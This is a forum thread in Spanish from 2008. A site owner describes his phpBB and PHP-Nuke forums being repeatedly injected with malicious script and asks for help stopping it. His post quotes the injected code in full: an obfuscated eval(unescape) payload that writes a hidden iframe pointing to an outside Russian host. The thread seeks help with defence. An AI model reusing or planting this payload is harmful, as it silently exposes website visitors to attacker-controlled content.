Foros del Web

Foros del Web (http://www.forosdelweb.com/)
-   Sistemas de gestión de contenidos (http://www.forosdelweb.com/f54/)
-   -   Codigo malicioso ataca foro phpbb2 phpbb3 y phpnuke (http://www.forosdelweb.com/f54/codigo-malicioso-ataca-foro-phpbb2-phpbb3-phpnuke-557203/)

pappocapo 15/02/2008 09:20
Codigo malicioso ataca foro phpbb2 phpbb3 y phpnuke
 
Voy a ser breve, mi web es atacada con scripts maliciosos a cada rato. ya me paso cuando tenia phpnuke, tambien con foro phpbb2 2.0.22 y ahora me pasa con mi nuevo foro phpbb3.0.0 el cual esta con el template que viene por defecto PROSILVER sin ningun mod instalado, todo como viene original.
En las index o en diferentes archivos se inserta solo sin que yo modifique nada este codigo

Código:
<!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%33%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%33%32%39%29%2b%27%64%31%33%36%61%38%66%66%5c%27%20%77%69%64%74%68%3d%37%31%20%68%65%69%67%68%74%3d%33%39%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
Cuando se inserta este codigo el foro comienza a tener diferentes errores.... paginas que se quedan colgadas en blanco, en el header me sale el error que dice no se puede modifcar.... , error de caracteres de lenguaje,etc etc.

El codigo nuevo que se mete es siempre el mismo esta vez, la vez anterior era otro. Yo lo que estoy tratando de lograr es evitar la ejecucion de esos script externos no se si ese es el camino.

Como dato les digo que me doy cuenta de que ese codigo se metio porque los archivos cambian de tamaño (se ponen mas pesados) que los originales ya que esta el codigo malicioso, sobreescribo todo con los archivos de mi back up y funciona todo bien de nuevo, lo que pasa es que a veces esto ocurre tres veces por dia y como veran es imposible sostener una web asi.

Otro dato que les doy es que me paso con diferentes versiones de nuke, de phpbb2 y ahora phpbb3.0.0 y con diferentes templates por lo cual descarto que sea un problema en ellos, lei por algunas paginas que tuvieron el mismo problema que son codigos maliciosos rusos de paginas de alla pero nadie dio en la tecla como pararlos

Alguna idea?

pappocapo 15/02/2008 22:10
Re: Codigo malicioso ataca foro phpbb2 phpbb3 y phpnuke
 
Aca encontre dos webs que creo se toca el tema pero estan en ingles y mis conocimientos son mas que limitados, alguien las pueder ver y darme una pista?

http://www.securityfocus.com/archive/1/319419

http://www.velocityreviews.com/forums/t160472-what-is-this-script.html


La zona horaria es GMT -6. Ahora son las 12:43.

Desarrollado por vBulletin® Versión 3.8.7
Derechos de Autor ©2000 - 2026, Jelsoft Enterprises Ltd.